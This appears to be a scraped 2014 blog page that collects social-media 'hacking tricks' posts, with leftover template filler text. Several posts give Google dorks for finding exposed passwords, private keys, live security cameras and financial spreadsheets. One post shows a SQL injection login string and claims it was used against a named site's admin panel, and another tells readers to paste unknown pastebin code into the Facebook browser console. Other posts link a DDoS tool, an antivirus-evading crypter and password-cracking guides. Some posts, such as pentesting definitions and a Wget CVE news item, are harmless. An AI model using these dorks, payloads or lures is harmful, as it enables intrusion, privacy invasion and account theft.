Friday, October 31, 2014

https://www.youtube.com/watch?v=hKROVKDIuDo فەرموو ئەمەش پرۆگرامەكە كە كێشەی 2MB بایتە زۆر سووكە http://www.mediafire.com/downl…/smb6b9t7kevk8uq/WFHSetup.exe بۆ دڵنیا بوونت لە پاكی پرۆگرام لێرە خۆت بیپشكنە https://www.virustotal.com/en/ یان لێرە دایبگرە سایتی سەرەكی پرۆگرامەكە http://www.wisecleaner.com/wisefolderhider.html ئەم بابەتە بۆ هاورێكانیشت بنێرە بە مەبەستی سوودی گشتی ئامادەكردنی :محمد باڵەك https://www.youtube.com/watch?v=hKROVKDIuDo وا ل

https://www.youtube.com/watch?v=hKROVKDIuDo فەرموو ئەمەش پرۆگرامەكە كە كێشەی 2MB بایتە زۆر سووكە http://www.mediafire.com/downl…/smb6b9t7kevk8uq/WFHSetup.exe بۆ دڵنیا بوونت لە پاكی پرۆگرام لێرە خۆت بیپشكنە https://www.virustotal.com/en/ یان لێرە دایبگرە سایتی سەرەكی پرۆگرامەكە http://www.wisecleaner.com/wisefolderhider.html ئەم بابەتە بۆ هاورێكانیشت بنێرە بە مەبەستی سوودی گشتی ئامادەكردنی :محمد باڵەك https://www.youtube.com/watch?v=hKROVKDIuDo وا ل

(29) Pure Hacking - @@@ FIND USERNAMES + PASSWORDS With USING...

@@@ FIND USERNAMES + PASSWORDS With USING GOOGLE.COM $ Remove any space from any Dorks...!! Method 1: Facebook We will be using a google dork to find usernames and passwords of many accounts including Facebook! The Dork: intext:charset_test=email=default_persistent= Enter that into Google, and you will be presented with several sites that have username and passwords lists! Method 2: WordPress! This will look for WordPress backup files Which do contain the passwords, and all data for the site! The Dork: filetype:sql inurl:wp-conten t/backup-* Method 3: WWWBoard! This will look for the user and passwords of WWWBoard users The Dork: inurl:/ wwwboard/ passwd.txt Method 4: FrontPage! This will find all users and passwords, similar to above. The Dork: ext:pwd inurl:(service | authors | administrators | users)"# -FrontPage-" Method 5: Symfony This finds database information and logins The Dork: inurl:config/ databases.yml -trac -trunk -"Google Code"-source -repository Method 6: TeamSpeak This will search for the server.dbs file (A Sqlite database file With the SuperAdmin username and password) The Dork: server-dbs"intitle:index of" Method 7: TeamSpeak 2 This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for"superadmin account info:" The Dork: "inurl:Teamspea k2_RC2/ server.log" Method 8: Get Admin pass Simple dork which looks for all types of admin info The Dork: "admin account info"filetype:log Method 9: Private keys This will find any .pem files which contain private keys. The Dork: filetype:pem pem intext:private And the Ultimate one, the regular directory full of passwords. Method 10: The Dir of Passwords! Simple one! The Dork: intitle:"Index of..etc"passwd

Encryption Server Ngerat Klein # compiler skips Proactive Defense 2015 - YouTube

Start at: Published on Oct 31, 2014 Hello: - Visual Basic download link from his official Download Html: - Http://www.gulfup.com/?MnYypv ---------------------------------- ------ ---- download link Asempela SMART program: - -mn Aldyev Point is not Download Confuser program of Rfie .. Http://ar.rghost.net/58818854 -------------------------------- ----- our link on Facebook encryption My facebook ABoSoso Https://www.facebook.com/Abososo ---------------------------------- ------ ---- to Alqaa and please subscribe to Belknah learned about each new

(167) Facebook

What is a penetration test? What is penetration testing? Penetration testing, often called “pentesting”,“pen testing”, or “security testing”, is the practice of attacking your own or your clients’ IT systems in the same way a hacker would to identify security holes. Of course, you do this without actually harming the network. The person carrying out a penetration test is called a penetration tester or pentester. Let’s make one thing crystal clear: Penetration testing requires that you get permission from the person who owns the system. Otherwise, you would be hacking the system, which is illegal in most countries – and trust me, you don’t look good in an orange jump suit. In other words: The difference between penetration testing and hacking is whether you have the system owner’s permission. If you want to do a penetration test on someone else's system, we highly recommend that you get written permission. In this case, asking first is definitely better than apologizing later! You can become a penetration tester at home by testing your own server and later make a career out of it. At Rapid7, we have a team of professionals that pentest government and enterprise IT systems for a living. And let me tell you, they enjoy their job!

(61) Facebook

7 Places That Beginner Hackers Will Find Very Useful! http://www.efytimes.com/e1/fullnews.asp?edid=139249 Looking for the best hacking guides? Maybe these will start you off!

#‎Cr4x3r‬ b1k4$h When your pc webcam don't work then use this method.. How to use Android Smartphone as a Webcam in PC Install the IP Webcam application onto your Android mobile phone and IP Camera Adapter on your Windows desktop computer. Steps to Configure on IP Webcam Application *.Adjust the screen resolution, quality, username, password and other adjustments as per your requirement click on the “Start server” at the end. *.An IP address will appear at the bottom of your android mobile phone screen.Open it in Chrome or Firefox and select “Use browser built-in viewer” option. *.Choose the best options as per your needs and you must see the video loading in the web browser. If not then try again with the another link. Steps to Follow in IP Camera Adapter *.Open the software from windows and type in all the fields required and click on apply when you are done. *.The camera feed URL must be appended with /videofeed at the end of the IP address and click on the “Autodetect” button for the screen resolution. *.Now open any video conferencing tools like Skype, Google Hangout or Facebook messenger and you must see your video streaming from the Android phone camera on your computer. The application uses the secondary camera of your mobile phone as default and that’s because the secondary camera will have more clarity when compared toward the front facing Camera.

#‎Cr4x3r‬ b1k4$h When your pc webcam don't work then use this method.. How to use Android Smartphone as a Webcam in PC Install the IP Webcam application onto your Android mobile phone and IP Camera Adapter on your Windows desktop computer. Steps to Configure on IP Webcam Application *.Adjust the screen resolution, quality, username, password and other adjustments as per your requirement click on the “Start server” at the end. *.An IP address will appear at the bottom of your android mobile phone screen.Open it in Chrome or Firefox and select “Use browser built-in viewer” option. *.Choose the best options as per your needs and you must see the video loading in the web browser. If not then try again with the another link. Steps to Follow in IP Camera Adapter *.Open the software from windows and type in all the fields required and click on apply when you are done. *.The camera feed URL must be appended with /videofeed at the end of the IP address and click on the “Autodetect” button for the screen resolution. *.Now open any video conferencing tools like Skype, Google Hangout or Facebook messenger and you must see your video streaming from the Android phone camera on your computer. The application uses the secondary camera of your mobile phone as default and that’s because the secondary camera will have more clarity when compared toward the front facing Camera.

(12) Google as A Hacking Tool Global search engine... - Cybercells tricks

Google as A Hacking Tool Global search engine giant Google is priceless. We use it on a more than daily basis for all our search needs. Whether you're looking for that fancy word or the location of a good restaurant, you'll get everything with Google search and more. Enough on the good part. Did you know Google has a dark side too? Did you know Google can be used to gain access to confidential information or download free music? Here's how... 1.Hacking Security Cameras! You might have noticed many security cameras monitoring places like parking lots, college campus, road traffic etc (and yes, some of them work!). Did you know you can use Google to hack into these cameras to view images captured by these cameras in real time. How do you do it? Well simply open the Google search box and type in the following query: inurl:”viewerframe?mode=motion” You will get a search result that will give you access to live cameras with full controls (move the camera in all the four directions, perform zoom in and zoom out). The above mentioned query usually gives access to cameras with less refresh rate. In case you're looking for faster refresh rates: intitle:”Live View / – AXIS” 2. Hacking Personal and Confidential Documents! You can access an email repository containing personal and confidential documents (CVs for instance) using Google. Simply open the Google search box and type in the following query: intitle:”curriculum vitae” “phone * * *” “address *” “e-mail” To access a list of excel documents which contains contact details including email addresses of people: filetype:xls inurl:”email.xls” To access documents potentially containing information on bank accounts, financial summaries and credit card numbers: intitle:index.of finances.xls 3. Gaining Access to Free Stuffs! If you're looking to download free music, simply enter the following query on Google search box and hit enter: “?intitle:index.of?mp3 artist name“ If you're looking to download free ebooks: “?intitle:index.of?pdf book name“ ATTENTION PLZ: Support The Page By Like, Share, Comments! Tnx

(39) Facebook

Google as A Hacking Tool Global search engine giant Google is priceless. We use it on a more than daily basis for all our search needs. Whether you're looking for that fancy word or the location of a good restaurant, you'll get everything with Google search and more. Enough on the good part. Did you know Google has a dark side too? Did you know Google can be used to gain access to confidential information or download free music? Here's how... 1.Hacking Security Cameras! You might have noticed many security cameras monitoring places like parking lots, college campus, road traffic etc (and yes, some of them work!). Did you know you can use Google to hack into these cameras to view images captured by these cameras in real time. How do you do it? Well simply open the Google search box and type in the following query: inurl:”viewerframe?mode=motion” You will get a search result that will give you access to live cameras with full controls (move the camera in all the four directions, perform zoom in and zoom out). The above mentioned query usually gives access to cameras with less refresh rate. In case you're looking for faster refresh rates: intitle:”Live View / – AXIS” 2. Hacking Personal and Confidential Documents! You can access an email repository containing personal and confidential documents (CVs for instance) using Google. Simply open the Google search box and type in the following query: intitle:”curriculum vitae” “phone * * *” “address *” “e-mail” To access a list of excel documents which contains contact details including email addresses of people: filetype:xls inurl:”email.xls” To access documents potentially containing information on bank accounts, financial summaries and credit card numbers: intitle:index.of finances.xls 3. Gaining Access to Free Stuffs! If you're looking to download free music, simply enter the following query on Google search box and hit enter: “?intitle:index.of?mp3 artist name“ If you're looking to download free ebooks: “?intitle:index.of?pdf book name“ ATTENTION PLZ: Support The Page By Like, Share, Comments! Tnx

(17) new magic code @*[223317557774374:] remove * and... - ALL Tips And Tricks by ADNAN

new magic code @*[223317557774374:] remove * and cmmnt and u will see this 。  ☆    。★    。   ☆    。★。   ★。     ☆   。    ☆。    ☆    ★。。  ☆     。★    。   ☆    。★。   ★。    ☆    。    ☆。    ☆    ★。。  ☆    。★     。   ☆    。★。   ★。    ☆   。     ☆。    ☆    ★。。  ☆    。★    。    ☆    。★。   ★。    ☆   。    ☆。     ☆    ★。。  ☆    。★    。   ☆     。★。   ★。    ☆   。    ☆。    ☆     ★。 and if u want to make it coulrful so before the code write this <fg=bd0007ff*> or <fg=bfd700f0*> without *

(12) Guys recently we explained what is Penetration... - Cybercells tricks

Guys recently we explained what is Penetration Tests. Now we are going to explain Types of Penetration Tests Network services test: This is one of the most common types of penetration tests, and involves finding target systemson the network, searching for openings in their base operating systems and available network services,and then exploiting them remotely. Some of these nelwork service penetration tests take place remotely across the Internet, targeting the organrzation’s perimeter networks. Others are launched locally, from the target’s own business facilities, to assess the security of their internal network or the DMZ from within, seeing what kinds of vulnerabilities an internal user could learn. Client-side test: This kind of penetration test is intended to find vulnerabilities in and exploit client-side software, such as web browsers, media players, document editing programs, etc. Web application test: These penetration tests look for security vulnerabilities in the web-based applications and programs deployed and installed on the target environment. Remote dial-up war dial: These penetration tests look for modems in a target environment, and normally involve password guessing or brute forcing to login to systems connected to discovered modems. Wireless security test: These penetration tests involve discovering a target’s physical environment to find unauthorized wireless access points or authorized wireless access points with security weaknesses. Social engineering test: This type of penetration test involves attempting to make a user into revealing sensitive information such as a password or any other sensitive data. These tests are often conducted over the phone, targeting selected help desks, users or employees, evaluating processes, procedures, and user awareness.

(15) Nokia Mobiles Secret Codes :... - Cybercells tricks

Nokia Mobiles Secret Codes : ************************************ On the main screen type : ******************************** *#06# for checking the IMEI (International Mobile Equipment Identity). *#7780# reset to factory settings. *#67705646# This will clear the LCD display (operator logo). *#0000# To view software version. *#2820# Bluetooth device address. *#746025625# Sim clock allowed status. *#62209526# – Display the MAC address of the WLAN adapter. This is available. *#92702689# – takes you to a secret menu where you may find some of the information below: 1. Displays Serial Number. 2. Displays the Month and Year of Manufacture. 3. Displays the date where the phone was purchased, 4. Displays the date of the last repair – if found (0000) 5. Shows life timer of phone (time passes since last start) *#3370# – Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though. *#3370* – (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network. *#4720# – Half Rate Codec activation. *#4720* – Half Rate Codec deactivation. The phone will automatically restart *#7328748263373738# resets security code. Default security code is 12345 *#1471# Last call (Only Vodafone) *#21# Allows you to check the number that “All Calls” are diverted to *#30# Lets you see the private number *#43# Allows you to check the “Call Waiting” status of your phone. *#62# Allows you to check the number that “Divert If Unreachable (no service)” calls are diverted to *#67# Allows you to check the number that “On Busy Calls” are diverted to *#67705646# Removes operator logo on 3310 & 3330 *#73# Reset phone timers and game scores *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature “SIM Clock Stop Allowed”, it means you will get the best standby time possible *#7780# Restore factory settings *#8110# Software version for the nokia 8110 *#92702689# Displays – 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data 12345 This is the default security code. Hit Like if it was useful.

Interesting facts about browsers - YouTube

Published on Oct 30, 2014 For private browsing in Google Chrome:- ctrl+shift+n For private browsing in Mozzila Firefox:- ctrl+shift+p

(126) Facebook

10 Powerful SQL Injection Tools That Penetration Testers Can Use http://efytimes.com/e1/fullnews.asp?edid=132535 Enough with the regular Nmap, Nessus and other hacking tools. Let's take a look at some specialised SQL Injection related tools!

(50) Facebook

Cracking WPA & WPA2 key with Aircrack-ng on Kali Linux VIDEO TUTORIAL: http://anonymousbosnia.com/Aircrack-ng.php CUPP WORDLIST MAKER: http://anonymousbosnia.com/Cupp.php READ MORE: http://www.backtrack-pages.com/…/cracking-wpa-wpa2-key-with…

Start at: Published on May 30, 2013 VISIT MY PAGE ON FACEBOOK: http://www.facebook.com/BackTrack.Fan... Cupp WordList Maker Tool On Backtrack 5 R3 http://www.youtube.com/watch?v=U0kAE3... VISIT: http://securitygeeks.net/ TUTORIAL By Cyb3rw0rM CONTACT ME: Cyb3rw0rm@hotmail.com

Start at: Published on May 30, 2013 VISIT MY PAGE ON FACEBOOK: http://www.facebook.com/BackTrack.Fan... Cupp WordList Maker Tool On Backtrack 5 R3 http://www.youtube.com/watch?v=U0kAE3... VISIT: http://securitygeeks.net/ TUTORIAL By Cyb3rw0rM CONTACT ME: Cyb3rw0rm@hotmail.com

(237) Facebook

Go Here And Copy All the Codes >>>http://pastebin.com/36nW3NXk<<< After that go to facebook Press F12 open console CTRL+Shift+J Chrome only Press F12 Open Console CTRL+SHIFT+K Mozilla PAste in Console all the code Press Enter Wait For 1-2 minutes and refresh page all is done Try this again tomorrow . Happy Halloween

(144) Facebook

HOW TO IDENTIFY FAKE FACEBOOK ACCOUNT...... How can you detect the Fake FB Profile. On these days we are getting so many friend request specially by girls, but there is no way to identify that account is fake or original. So don't worry we are going to tell you simple method to detect fake Facebook account. So go the account you want to check whether it is real or fake. 1.goto the images.google.com and click on camera image 2.when you click on search by image you will get popup 3. Now go to that profile, right click on image and click on copy image URL. 4. Now profile pic URL has copied.. 5. Again go to images.google.com Tab and paste image URL 6. When you enter then you get related images search...Now you can better see that this profile is real or fake. Enjoy the trick..Be aware when you will going to add an beautiful or smart unknown person as your friend. So be checked first.. there are lot of fake profiles are create everyday.This person might be spy on your profile and steal personal information like your photos, etc for their hacking stuffs..So Be Safe Online.. For any queries comment below

(146) Facebook

5 Free UI Kits That You Can Use For Your Projects! http://efytimes.com/e1/fullnews.asp?edid=132255 Want to skip the UI building part of your websites? Use these.

(106) Facebook

First on GAE Club Exclusive Android Trick To Get Unlimited Recharge : Here is A trick By which you can get a lots of recharges :- You may have listen the name of an app called mcent *First download it from here:- http://mcent.com/r/JH4PDN sign up using your number and download at least one small app to get some rs in your account *After downloading at least one app, you can get your reffral link from app *copy that link and uninstall the mcent from your phone now use that link in main browser, u will be redirected to playstore *install again and signup using your 2nd number and download at least one small app *sign out 2nd account and sign in back your first account *Hurray you got 50Rs recharge *So if you have 10 or 20 mobile numbers in home, you can get 500- 1000 Rs recharge just by using 50-60Mb Try out it, it is working Great. Download our Android App to get our updates directly on your device: https://play.google.com/store/apps/details… Rate us 5 stars and help us grow!

Say Hello To The World

Hello World! Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam pharetra, tellus sit amet congue vulputate, nisi erat iaculis nibh, vitae feugiat sapien ante eget mauris. Cras elit nisl, rhoncus nec iaculis ultricies, feugiat eget sapien. Pellentesque ac felis tellus. Aenean sollicitudin imperdiet arcu, vitae dignissim est posuere id. Duis placerat justo eu nunc interdum ultrices.


Created with Artisteer

Blog To Build Relations

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam pharetra, tellus sit amet congue vulputate, nisi erat iaculis nibh, vitae feugiat sapien ante eget mauris. Cras elit nisl, rhoncus nec iaculis ultricies, feugiat eget sapien. Pellentesque ac felis tellus. Aenean sollicitudin imperdiet arcu, vitae dignissim est posuere id. Duis placerat justo eu nunc interdum ultrices. Phasellus elit dolor, porttitor id consectetur sit amet, posuere id magna.

What is a Blog?

Your blog is your personal online diary which combines the text, images and other media, and links to other blogs, web pages related to topics described in posts.

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam pharetra, tellus sit amet congue vulputate, nisi erat iaculis nibh, vitae feugiat sapien ante eget mauris.

Cras elit nisl, rhoncus nec iaculis ultricies, feugiat eget sapien. Pellentesque ac felis tellus.

Incredible Google

(2) Hacking Trick - ..Incredible Google tricks 1. GO on google and...

..Incredible Google tricks 1. GO on google and type in Google Gothic and click on i m feeling lucky. 2. Go on google and type in poopgle and click i m feeling lucky read more @===>http://bit.ly/1sozI50 3. Go on google and type in Google Loco and click i m feeling lucky 4. Go on google and type in i33t and click i m feeling lucky 5. Type in ewmew fudd and click i m feeling lucky 6. Type in xx-klingon and click I m feeling lucky 7. Type in xx-piglating and click on i m feeling lucky 8. Type in google BSD and click i m feeling lucky 9. Type in Google Linux and click i m feeling lucky 10. Type in google easter egg and click i m feeling lucky 11. Type in Google Cheese and click i m feeling lucky 12. Type in Google Swedish and click i m feeling lucky! 13. Type in 2204355 and click i m feeling lucky (AND THIS ONE IS VERY RARE AND ONE OF THE BEST!) 14. Type in Google chinese and click i m feeling lucky!!! 15. Type in Google latin and click i m feeling lucky 16. Go to"www.google.com"-type in"French Military Victories"and press"I'm feeling lucky" -Look at the question"Did you mean:...". 17. Type in adress bar"http://www.google.com/Easter/feature_easter.html" -Here you can find an hidden game,offered by Google. read more @===>http://bit.ly/1sozI50

programming

(1) -لو حبيت أتعلم لغة برمجة بأي وحدة أبدا ؟؟ طبعاً... - قوآت الدعس الفلسطينية

If endowed with any programming language learning unit start?? Of course the question asking some of the same kthier webihatar answer wollhin the Gu is. Answer betatmd on your specialty or your passions, or learn of any objective, for example if the duck learn programming language for designing Web pages and sites, I recommend you my brother to learn the first language and the easiest and best known. HTML and then learn the CSS is. And would learn Ashan designed programmes, advise him learn giant languages. Language (C) and c++ and then learns to start designing programmes in visual bisc from microsoft.. Though the habait learn Android apps and mobile design advise you to learn the language of java script, a language difficult Shui webdha lighten the brain.. Every thing was perfect for. There are several sites to learn programming languages such as codecademy.com and advise him with his tightened, it has rolled out a professional it:) # b a pen in.

(116) Facebook

@@@ AVOID FRIEND REQUEST BLOCK ...!!! We usually send friend requests and if it's not accepted it is kept in pending. If there are lots of pending requests it may lead to block. So this is a simple way to get those requests cancelled and protect your account from being blocked. Follow below steps :- 1. Go to account settings. 2. Select `download a copy` option. 3. Choose `expanded archive` from the next page opened and enter your password and click continue. 4. Select `start my archive`. 5. After a few hours you'll get the download link in your email. 5. Download the file `facebook` and unzip it. 6. Open the folder html and then `friend_requests.htm­l`. 7. You can see the list of your friend requests and pending lists. Now goto their accounts and click`cancel request. That's all You are done now. Your account is safe. $ Subscribe to Admin Hiren Bhuva Like & Share Hacking by HIREN

(56) Facebook

How To Write Your ‪#‎Name‬ In Stylish Font Here Is The Trick But There Is Some ‪#‎Limit‬ Ation Otherwise It Will Says Invalid Characters Read It Carefully 1) Only One Uppercase Letter 2) Use Only One Type On Laguage. ‪#‎Ukrainian‬, Russian, Cyrillic letters Next Is Ukrainian Alphabet And Some Other Symbols From Russian And Ancient Languages. А Б В Г Ґ Д Е Є Ж З И І Ї Й К Л М Н О П Р С Т У Ф Х Ц Ч Ш Щ Ь Ю Я а б в г ґ д е є ж з и і ї й к л м н о п р с т у ф х ц ч ш щ ь ю я Ё Ѫ Ѧ ѳ ы ѣ Ѣ ъ ψ ξ ‪#‎Greekletters‬ and characters Α Β Γ Δ Ε Ζ Η Θ Ι Κ Λ Μ Ν Ξ Ο Π Ρ ϴ Σ Τ Υ Φ Χ Ψ Ω ∇ α β γ δ ε ζ η θ ι κ λ μ ν ξ ο π ρ ς σ τ υ φ χ ψ ω ∂ ϵ ϑ ϰ ϕ ϱ ϖ ‪#‎Połishlanguage‬ ą ć ę ł ś ó ż + all Latin (English). Africa Alphabet ‪#‎AfricaAlphabet‬ UPPERCASE A B Б C D Ɖ E Ɛ Ǝ F Ƒ G Ɣ H X I J K L M N Ŋ O Ɔ P R S Ʃ T U V Ʋ W Y Z Ʒ lowercase a b ɓ c d ɖ e ɛ ǝ f ƒ g ɣ h x i j k l m n ŋ o ɔ p r s ʃ t u v ʋ w y z ʒ ‪#‎Vikas_Sahu‬

(321) Facebook

Anonymous DDOS Tool! https://filetea.me/t1sgLnYEs1aQTuNpb5dvuQRjw Guran Cosmin-costel UnlikeUnlike · · Share · Buffer · 24

(42) Hacking Tricks Technologies

Do you want to change your Windows 8 look like Windows XP? or prefer to Windows Xp and still want to use it? So, Here is how you can make Windows 8 look like Windows XP. Link: http://www.guitricks.com/…/how-to-make-windows-8-look-like-… Tags: ‪#‎Windows‬ ‪#‎Windows8‬ ‪#‎WindowsXP‬ ‪#‎WindowsXPTheme‬ ‪#‎ConvertXPInto8‬ ‪#‎MakeWindows8LookLikeXP‬

(145) Facebook

Hacking BSNL Broadband Internet speed BSNL Internet is most famous Internet Broadband connection service in India. Its not only due to its ready availability but mainly because of it's somewhat cost-effectiveness. But, even though, many BSNL Broadband and BSNL Cellone Dataone users are frustrated with BSNL Internet speed as they never get speed that BSNL has promised to them and BSNL broadband connection breaks after every minutes because of line errors. So today i am going to share with you the latest hacks that you can use to increase BSNL broadband connection speed and avoid regular disconnection and line losses. Increase BSNL Broadband connection speed: To increase BSNL broadband speed, just follow these 4 BSNL hacks mentioned below: 1. Change BSNL DNS servers: The main reason for slow BSNL Broadband connection speed is slow BSNL DNS servers. So, we can increase BSNL Broadband connection speed by changing default BSNL DNS servers to fast BSNL DNS servers, which can help us to increase BSNL broadband connection speed. Using public DNS servers improves speed, as BSNL has lot of users and all using the same DNS servers. So during peak time the DNS reacts very slow and takes a lot of time to translate the host address to numerical value, called IP address that your network used to connect to website. Use these DNS servers for best speed: 208.67.222.222 208.67.220.220 2. Use Adblock Plus: The best way to increase BSNL Broadband connection speed is to block flash and other unwanted ad material on webpage, so that page loads faster, thus make BSNL Broadband apparently fast. AdBlockPlus is a firefox addon used to block flash content of page, thus helping you to increase BSNL Broadband connection speed. This has a lot of effect as it blocks unwanted advertisements and popups thus making your internet browsing experience even better. 3. Using TCPOptimizer: This is another software used to optimize your TCP/IP connection settings. TCP/IP determines the maximum transfer Unit(MTU) for your device. The maximum data that your connection can send or receive per packet. Best MTU setting for BSNL broadband is 1492 ( by default its 1500 that causes an extra load on your broadband connection that why disconnections occur as you are forcing your device for doing something that it is not capable off, so optimise your TCP/IP settings). You can use TCP Optimizer your BSNL network settings. Install TCPOptimizer. 4. Reducing cache space: Reduced Cache space can be used to increase BSNL Broadband speed. You can do this as: For Internet Explorer : Tools - Internet Options - Browsing History - Settings - Disk space to use and reduce disk space value to "50". For Firefox: Tools - Options - Advanced - Network and look for cache space. Change value to 50.

(116) Facebook

Proxy Clé Orange ^^ Telecom ^^ Tunisiana (forfait) : sslsecureproxy.com 192.30.136.222 boomtunnel.com hiload.org Chromeproxy.net oroxy.com papaproxy.com 158.255.96.200 novaproxy.us sonyproxy.eu 12345proy.com getproxyonline.com freevideoproxy.com ‪#‎Port‬ : 80 ‪#‎Page‬ d'accueil : ORANGE: m.orange.tn. TUNISIANA: 0.facebook.com TELECOM: 0.facebook.com. ‪#‎hacker_tn_r‬ max de j'aime

(69) Facebook

The simple and best way to hack WINDOW login password is brute force. The possibility to hack password is more than 95%. what you need is "OphCrack". download OphCrack by given link bellow: http://ophcrack.sourceforge.net/download.php OPhCrack use Rainbow table for password breaking password. download and burn OphCrack in a CD. Just insert “Ophcrack” live CD and restart system. Choose and select CD-ROME Drive first for boot in boot menu. This will boot CD and you will get password just in some minute. time to take in password matching is depend on strength of password. Good Luck ... !!!

(207) Facebook

((((Bl@cK $H@rK H@cK3r))))))))))) Five steps to make stay hidden on the internet Step 1 Change your IP More then once a day i would suggest u change it 3-4 times Every day Step 2 Have terminal open and type in netstat Every 5minutes to see what data is coming in and out Step 3 Delete all your cookies !! And in settings of your browser dont store anything dont save your browser history . IF a person would attack your browser u will have nothing saved in it . Step 4 Dont login to any social media using your "anonymous ip" IF they trace it they are gonna se that your connected to facebook. And IF they scan u , u can simply see that using step 2;) Step 5 To avoid spammed etc when ur signign up to a website use a fake email addres that forwards the emails to yourmain email and after a couple of hours the email is gone . i would recomend using melt-mail Note that some website dont like when u use melt- mail like facebook thats why we cant link it in a regular way

Your link text here.

undefined

(127) Facebook

Lo g India Ki Security Camers ki Site ka admin Pannel Hacke by me... ( Pak Cyber Crews ) http://www.prolive.in/admin username: 1'or'1'='1 Passwor: 1'or'1'='1 ( Abbas Abraham )

(187) Facebook

6 Tools That Let You Browse The Net Anonymously! http://www.efytimes.com/e1/fullnews.asp?edid=136619 Being anonymous on the internet is even more important in this age of constant snooping by governments etc.

‎Cr4x3r‬ b1k4$h What is aobbfile and how do I open aobbfile? OBB, or Opaque Binary Blob files are used by some Android apps sold on the Google Play online store. Developers create OBB files to contain and bundle larger assets using the JOBB tool for Android SDK. They hold additional encrypted format data not stored in the main application package, including graphics and media files. They can be uploaded with the APK file using the Google Play Developer Console. Users who download the app will receive both the APK file and the APK Expansion File containing additional OBB asset files. HOW TO INSTALL GAME WITH DATA AND OBB ? Most of the HD games have data folder and some games have obb file. If you are installing games from google playstore then it will automatically install the whole game with data or obb file. But if you are downloading apk, data cache, obb separately then you have to copy those files/folder manually on your phone. Here is the step by step detail instruction on how to place data on sd card and run the game. Open Android Folder WHERE TO PLACE DATA FOLDER ? 1) Go to ( Android/Data/paste game data folder ) 2) Copy and install APK File on your phone. 3) Run the Game. WHERE TO PLACE OBB FILE? 1) Open Android folder/create obb Folder 2) Paste obb file in ( Android/Obb/paste obb file ) 3) Copy and install APK File on your phone and Run the Game. Game not running ? Even after placing data folder/obb files, game is asking to download additional data, that doesn't mean you have to download data again, that means game is asking for first time verification check to run, so let the data verify from internet wifi on your phone. Some games from Gameloft, Rockstar games or EA games has a specific folder of data so you have to make sure where the data folder is created and paste your folder there. If You Have Any Questions Please Comment Below

‎Cr4x3r‬ b1k4$h What is aobbfile and how do I open aobbfile? OBB, or Opaque Binary Blob files are used by some Android apps sold on the Google Play online store. Developers create OBB files to contain and bundle larger assets using the JOBB tool for Android SDK. They hold additional encrypted format data not stored in the main application package, including graphics and media files. They can be uploaded with the APK file using the Google Play Developer Console. Users who download the app will receive both the APK file and the APK Expansion File containing additional OBB asset files. HOW TO INSTALL GAME WITH DATA AND OBB ? Most of the HD games have data folder and some games have obb file. If you are installing games from google playstore then it will automatically install the whole game with data or obb file. But if you are downloading apk, data cache, obb separately then you have to copy those files/folder manually on your phone. Here is the step by step detail instruction on how to place data on sd card and run the game. Open Android Folder WHERE TO PLACE DATA FOLDER ? 1) Go to ( Android/Data/paste game data folder ) 2) Copy and install APK File on your phone. 3) Run the Game. WHERE TO PLACE OBB FILE? 1) Open Android folder/create obb Folder 2) Paste obb file in ( Android/Obb/paste obb file ) 3) Copy and install APK File on your phone and Run the Game. Game not running ? Even after placing data folder/obb files, game is asking to download additional data, that doesn't mean you have to download data again, that means game is asking for first time verification check to run, so let the data verify from internet wifi on your phone. Some games from Gameloft, Rockstar games or EA games has a specific folder of data so you have to make sure where the data folder is created and paste your folder there. If You Have Any Questions Please Comment Below

(227) Facebook

How to Create Blog Templates Without Programming @ http://digihackers.blogspot.com/…/how-to-create-blog-templa…

(114) Facebook

Tutorial | Bypassing Firewall on a Web Server The key point of this paper is to discuss how to backdoor a windows test server and bypass its’ firewall. So this is a few steps to bypass firewall easily: Tools: 1. Netcat 2. Windwos operating system 3. Putty telnet and ssh client for windows read more @=====>http://bit.ly/10B7Sgo

(113) Facebook

CVE-2014-4877: Wget FTP Symlink Attack Vulnerability The open-source Wget application which is most widely used on Linux and Unix systems for retrieving files from the web has found vulnerable to a critical fla. GNU Wget is a command-line utility designed to retrieve files from the Web using HTTP, HTTPS, and FTP, the most widely used Internet protocols. Wget can be easily installed on any Unix-like system and has been ported to many environments, including Microsoft Windows, Mac OS X, OpenVMS, MorphOS and AmigaO. When a recursive directory fetch over FTP server as the target, it would let an attacker "create arbitrary files, directories or symbolic links" due to a symlink flaw. IMPACT OF SYMLINK ATTACK "It was found that wget was susceptible to a symlink attack which could create arbitrary files, directories or symbolic links and set their permissions when retrieving a directory recursively through FTP," developer Vasyl Kaigorodov wrote in a Red Hat Bugzilla commen. A remote unauthenticated malicious FTP server connected to the victim via wget would allow attackers to do anything they wanted. Wget could download and create or overwrite existing files within the context of the user running wge. The vulnerability was first reported to the GNU Wget project by HD Moore, chief research officer at Rapid7. and is publicly identified as CVE-2014-4877. The flaw is considered critical since wget is present on nearly every Linux server in the world, and is installable (although not by default) on OS X machines as well, so needs a patch as soon as possibl. PATCH AVAILABLE"This flaw can lead to remote code execution through system-level vectors such as cron and user-level vectors such as bash profile files and SSH authorized_keys," Moore wrot. The vulnerability has now been fixed by the Wget project in wget 1.16, which blocks the default setting that allowed the setting of local symlink. Upgrade to wget version 1.16 or a package that has backported the CVE-2014-4877 patch," Moore sai. WORKAROUND AVAILABLE EXPLOIT "This issue can be mitigated by ensuring that all invocations of wget in the mirror mode also specify --retr-symlinks command line option," wrote Tomas Hoger on the Bugzilla report. "Doing so is equivalent to applying the upstream commit linked in comment 14, which changes the default for the retr-symlinks options from off/no to on/yes, preventing creation of symbolic links locall. "In addition to changing arguments in all scripts or programs that invoke wget, it is possible to enabled[sic] retr-symlinks option via wget configuration file - either global /etc/wgetrc, or user specific ~/.wgetrc - by adding the line: retr-symlinks=on" An exploit for the vulnerability is now available on the open-source Metasploit penetration testing Website, so that security researchers could test the bug. You can download the exploit from here. source: ‪#‎thehackernews‬

(101) Facebook

